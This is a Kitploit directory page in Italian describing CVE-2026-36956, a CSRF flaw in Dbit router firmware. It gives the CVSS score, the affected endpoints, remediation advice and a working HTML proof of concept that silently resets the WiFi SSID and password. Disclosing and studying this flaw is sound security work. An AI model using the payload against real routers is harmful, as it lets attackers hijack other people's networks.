Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-36956 — Proof-of-concept per CVE-2026-36956, una vulnerabilità CSRF nel firmware del router Dbit che consente modifiche non autorizzate alla configurazione tramite richieste contraffatte. | Kitploit
Strumenti/GitHubGitHub/kirubel-cve/cve-2026-36956
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubkirubel-cve/cve-2026-36956

CVE-2026-36956

Proof-of-concept per CVE-2026-36956, una vulnerabilità CSRF nel firmware del router Dbit che consente modifiche non autorizzate alla configurazione tramite richieste contraffatte.

Vedi Repository
65 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-36956: Cross-Site Request Forgery (CSRF) nell'interfaccia di gestione web

ID CVE: CVE-2026-36956 Data: 2026-04-29 Scopritore: Kirubel Solomne Vendor: Shenzhen Dibit Network Equipment Co., Ltd. Prodotto: Router Dbit Versione Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)


Descrizione

Il firmware V1.0.0 del router Dbit non implementa meccanismi di protezione CSRF come token anti-CSRF o una rigorosa validazione degli header Origin/Referer sugli endpoint API amministrativi. Un attaccante può creare una pagina web dannosa che invia richieste HTTP contraffatte agli endpoint di configurazione. Se un amministratore autenticato visita la pagina dannosa, il router elabora la richiesta contraffatta come un'azione amministrativa legittima.


Punteggio CVSS

Punteggio CVSS v3.1: 8.8 (Alto) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

MetricaValore
Vettore di attaccoRete
Complessità dell'attaccoBassa
Privilegi richiestiNessuno
Interazione utenteRichiesta
Impatto sulla riservatezzaAlto
Impatto sull'integritàAlto
Impatto sulla disponibilitàAlto

Endpoint interessati

EndpointFunzione
/api/setWlanConfigurazione della rete wireless (SSID, password)
/api/setWanConfigurazione WAN
/api/setSystemConfigurazione di sistema

Proof of Concept

Salvare il seguente codice come poc.html e aprirlo mentre un amministratore è connesso al router:

<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

Comportamento atteso: La richiesta dovrebbe essere rifiutata a causa della mancata corrispondenza del token CSRF. Comportamento effettivo: Il router accetta ed elabora la richiesta contraffatta.


Impatto

  • Modifica non autorizzata di SSID e password WiFi
  • Modifiche alla configurazione WAN/DNS
  • Denial of service per gli utenti legittimi
  • Acquisizione completa della configurazione del router

Rimedio

  • Implementare token anti-CSRF su tutti gli endpoint che modificano lo stato
  • Applicare una rigorosa validazione degli header Origin e Referer
  • Utilizzare l'attributo cookie SameSite=Strict per i cookie di sessione

Cronologia della divulgazione

DataEvento
2026-04-29Vulnerabilità scoperta
2026-04-29Segnalata a MITRE
2026-04-29Assegnato CVE-2026-36956
2026-04-29Divulgazione pubblica

Riferimenti

  • MITRE CVE-2026-36956
  • CWE-352
  • Sito del Vendor
Scarica lo strumento